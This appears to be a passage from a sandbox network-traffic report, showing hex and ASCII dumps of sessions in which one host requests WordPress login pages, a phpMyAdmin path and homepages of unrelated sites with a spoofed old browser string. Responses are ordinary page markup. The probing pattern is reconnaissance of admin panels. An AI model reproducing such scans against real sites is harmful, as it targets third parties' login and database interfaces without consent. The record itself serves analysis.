2024-02-20 23:26:21 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 6f 75 74 6c 69 6e 65 2d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 Data Ascii: 2000p-element-button,.ast-outline-button{border-color:#000000;font-family:inherit;font-weight:inherit;line-height:1em;border-top-left-radius:30px;border-top-right-radius:30px;border-bottom-right-radius:30px;border-bottom-left-radius:30px;}.wp-block-butt
2024-02-20 23:26:21 UTC	6	IN	Data Raw: 78 3b 7d 7d 2e 61 Data Ascii: x;}}.a
2024-02-20 23:26:21 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:21 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 3b 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 32 31 70 78 29 7b 2e 77 69 64 67 65 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 7d 62 6f 64 79 2c 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d Data Ascii: 2000st-separate-container{background-color:var(--ast-global-color-5);;background-image:none;;}@media (max-width:921px){.widget-title{font-size:22px;font-size:1.375rem;}body,button,input,select,textarea,.ast-button,.ast-custom-button{font-size:16px;font-

Session ID	Source IP	Source Port	Destination IP	Destination Port
273	192.168.2.6	54422	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	181	OUT	GET /wp-login.php HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	375	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:20 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:20 UTC	6192	IN	Data Raw: 31 38 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 41 6d 73 61 6e 20 54 65 63 68 6e 6f 6c 6f 67 79 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 Data Ascii: 1823<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Amsan Technology — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='style

Session ID	Source IP	Source Port	Destination IP	Destination Port
274	192.168.2.6	55020	217.26.61.200	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	163	OUT	GET /pma/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	458	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:19 GMT Server: Apache Set-Cookie: PHPSESSID=76sntb9saam2tag0gj80kn76ifnq5ttf; path=/ Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Link: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:20 UTC	7734	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 20 3e 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4b 35 32 4d 59 4b 4c 43 48 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 Data Ascii: 2000<!DOCTYPE html><html dir="ltr" lang="de-CH" prefix="og: https://ogp.me/ns#"><head >... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=G-K52MYKLCHE"></script><script> window.dataLay
2024-02-20 23:26:20 UTC	464	IN	Data Raw: 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 70 2d 62 6c 6f Data Ascii: size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-blo
2024-02-20 23:26:20 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:20 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 65 6d 20 2e 36 32 35 65 6d 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 67 72 6f 75 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 2e Data Ascii: 2000e.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.
2024-02-20 23:26:20 UTC	6	IN	Data Raw: 6f 6c 6f 72 2d 2d Data Ascii: olor--
2024-02-20 23:26:20 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:20 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d Data Ascii: 2000cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(-
2024-02-20 23:26:20 UTC	6	IN	Data Raw: 76 69 64 65 72 2d Data Ascii: vider-
2024-02-20 23:26:20 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:20 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 5f 5f 74 65 78 74 7b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 73 65 63 6f 6e 64 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 29 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 73 65 63 Data Ascii: 2000color:var( --e-global-color-secondary );}.elementor-widget-divider .elementor-divider__text{color:var( --e-global-color-secondary );font-family:var( --e-global-typography-secondary-font-family ), Sans-serif;font-weight:var( --e-global-typography-sec

Session ID	Source IP	Source Port	Destination IP	Destination Port
275	192.168.2.6	55309	45.147.96.4	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	168	OUT	GET / HTTP/1.1 Host: www.glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	449	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Link: <https://www.glazing-bt.com/wp-json/>; rel="https://api.w.org/" Link: <https://www.glazing-bt.com/wp-json/wp/v2/pages/7>; rel="alternate"; type="application/json" Link: <https://www.glazing-bt.com/>; rel=shortlink Strict-Transport-Security: max-age=31536000
2024-02-20 23:26:20 UTC	15935	IN	Data Raw: 66 65 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 Data Ascii: fedf<!DOCTYPE html><html lang="fr-FR" class="no-js" itemscope itemtype="https://schema.org/WebPage"><head><meta charset="UTF-8" />... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id
2024-02-20 23:26:20 UTC	16384	IN	Data Raw: 37 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 2d 66 72 6f 6e 74 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 2f 69 6e 63 6c 75 64 65 73 2f 2e 2e 2f 63 73 73 2f 66 72 6f 6e 74 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 30 2e 37 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6a 73 5f Data Ascii: 7' type='text/css' media='all' /><link rel='stylesheet' id='cookie-notice-front-css' href='https://www.glazing-bt.com/wp-content/plugins/cookie-notice/includes/../css/front.min.css?ver=6.0.7' type='text/css' media='all' /><link rel='stylesheet' id='js_
2024-02-20 23:26:21 UTC	16384	IN	Data Raw: 74 74 6f 6d 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 20 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 20 3e 20 75 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 30 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 30 3b Data Ascii: ttom}#Top_bar .menu > li > ul.mfn-megamenu-bg > li{background:none}#Top_bar .menu > li > ul.mfn-megamenu-bg > li a{border:none}#Top_bar .menu > li > ul.mfn-megamenu-bg > li > ul{background:none!important;-webkit-box-shadow:0 0 0 0;-moz-box-shadow:0 0 0 0;
2024-02-20 23:26:21 UTC	16384	IN	Data Raw: 20 30 20 32 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 23 6c 6f 67 6f 2c 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 2e 63 75 73 74 6f 6d 2d 6c 6f 67 6f 2d 6c 69 6e 6b 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 30 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 35 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 6f 67 6f 2d 6e 6f 2d 73 74 69 63 6b 79 2d 70 61 64 64 69 6e 67 20 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 36 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 36 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 23 54 6f 70 Data Ascii: 0 20px;padding:0}#Top_bar.is-sticky #logo,#Top_bar.is-sticky .custom-logo-link{padding:5px 0!important;height:50px!important;line-height:50px!important}.logo-no-sticky-padding #Top_bar.is-sticky #logo{height:60px!important;line-height:60px!important}#Top
2024-02-20 23:26:21 UTC	16384	IN	Data Raw: 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 20 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 6e 74 2d 70 61 67 65 2d 70 61 72 65 6e 74 20 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 0d 0a 66 66 64 31 0d 0a 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 61 6e 63 65 73 74 6f 72 20 3e 20 61 2c 2e 6d 65 6e 75 2d 68 69 67 68 6c 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 23 6d 65 6e 75 20 3e 20 75 6c 20 3e 20 6c 69 2e 63 75 72 72 65 Data Ascii: > a,.menu-highlight #Top_bar #menu > ul > li.current-menu-parent > a,.menu-highlight #Top_bar #menu > ul > li.current-page-parent > a,.menu-highlight #Top_bar #menu >ffd1 ul > li.current-menu-ancestor > a,.menu-highlight #Top_bar #menu > ul > li.curre
2024-02-20 23:26:21 UTC	16384	IN	Data Raw: 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 76 63 5f 63 75 73 74 6f 6d 5f 31 36 34 37 33 33 36 34 34 33 34 34 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 76 63 5f 63 75 73 74 6f 6d 5f 31 36 34 37 33 33 36 34 34 33 34 34 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e Data Ascii: round-position: 0 0 !important;background-repeat: no-repeat !important;}.vc_custom_1647336443442{background-position: 0 0 !important;background-repeat: no-repeat !important;}.vc_custom_1647336443442{background-position: 0 0 !important;background-repeat: n
2024-02-20 23:26:21 UTC	16384	IN	Data Raw: 2d 6c 61 7a 79 6c 6f 61 64 22 20 77 69 64 74 68 3d 22 33 30 30 22 20 68 65 69 67 68 74 3d 22 32 36 31 22 20 64 61 74 61 2d 6c 61 7a 79 6c 6f 61 64 3d 22 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 72 65 73 65 61 75 2d 6e 61 74 69 6f 6e 61 6c 2e 70 6e 67 22 20 64 61 74 61 2d 6e 6f 2d 72 65 74 69 6e 61 3e 20 0a 09 09 09 09 09 09 09 3c 2f 72 73 2d 6c 61 79 65 72 3e 3c 21 2d 2d 0a 0a 09 09 09 09 09 09 09 2d 2d 3e 3c 72 73 2d 6c 61 79 65 72 0a 09 09 09 09 09 09 09 09 69 64 3d 22 73 6c 69 64 65 72 2d 32 2d 73 6c 69 64 65 2d 32 2d 6c 61 79 65 72 2d 31 34 22 20 0a 09 09 09 09 09 09 09 09 64 61 74 61 2d 74 79 70 65 3d 22 69 6d 61 67 65 22 0a 09 09 09 09 09 09 09 09 64 61 74 61 2d 72 73 70 Data Ascii: -lazyload" width="300" height="261" data-lazyload="//www.glazing-bt.com/wp-content/uploads/reseau-national.png" data-no-retina> </rs-layer>...--><rs-layerid="slider-2-slide-2-layer-14" data-type="image"data-rsp
2024-02-20 23:26:21 UTC	16384	IN	Data Raw: 5f 66 69 67 75 72 65 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 63 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 2d 77 72 61 70 70 65 72 20 20 20 76 63 5f 62 6f 78 5f 62 6f 72 64 65 72 5f 67 72 65 79 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 33 30 31 22 20 68 65 69 67 68 74 3d 22 35 35 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 69 63 6f 6e 73 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 76 63 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 2d 69 6d 67 20 61 74 74 61 63 68 6d 65 6e 74 2d 66 75 6c 6c 22 20 61 6c 74 3d 22 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 Data Ascii: _figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img width="301" height="55" src="https://www.glazing-bt.com/wp-content/uploads/glazing-icons.png" class="vc_single_image-img attachment-full" alt="" loading="lazy" srcset="https://www
2024-02-20 23:26:21 UTC	16384	IN	Data Raw: c3 a9 72 65 72 20 64 65 73 20 70 72 6f 66 65 73 73 69 6f 6e 6e 65 6c 73 20 64 75 20 6d c3 a9 74 69 65 72 20 64 75 20 76 69 74 72 61 67 65 20 61 75 74 6f 75 72 20 64 e2 80 99 75 6e 65 20 65 6e 73 65 69 67 6e 65 20 6e 61 74 69 6f 6e 61 6c 65 2e 3c 2f 73 70 61 6e 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0d 0a 31 66 64 65 33 0d 0a 0a 09 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 77 70 62 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 20 77 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 20 76 63 5f 61 6c 69 67 6e 5f 6c 65 66 74 20 20 77 70 62 5f 61 6e 69 6d 61 74 65 5f 77 68 65 6e 5f 61 6c 6d 6f 73 74 5f 76 69 73 69 62 6c 65 20 77 70 62 5f 66 61 64 65 49 6e 20 66 61 64 65 49 6e 20 76 63 Data Ascii: rer des professionnels du mtier du vitrage autour dune enseigne nationale.</span></strong></span></p></div></div>1fde3<div class="wpb_single_image wpb_content_element vc_align_left wpb_animate_when_almost_visible wpb_fadeIn fadeIn vc
2024-02-20 23:26:21 UTC	16384	IN	Data Raw: 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 76 61 6c 65 75 72 73 2e 6a 70 67 20 35 30 30 77 2c 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 76 61 6c 65 75 72 73 2d 32 37 30 78 33 30 30 2e 6a 70 67 20 32 37 30 77 2c 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 6e 67 2d 76 61 6c 65 75 72 73 2d 31 33 32 78 31 34 36 2e 6a 70 67 20 31 33 32 77 2c 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 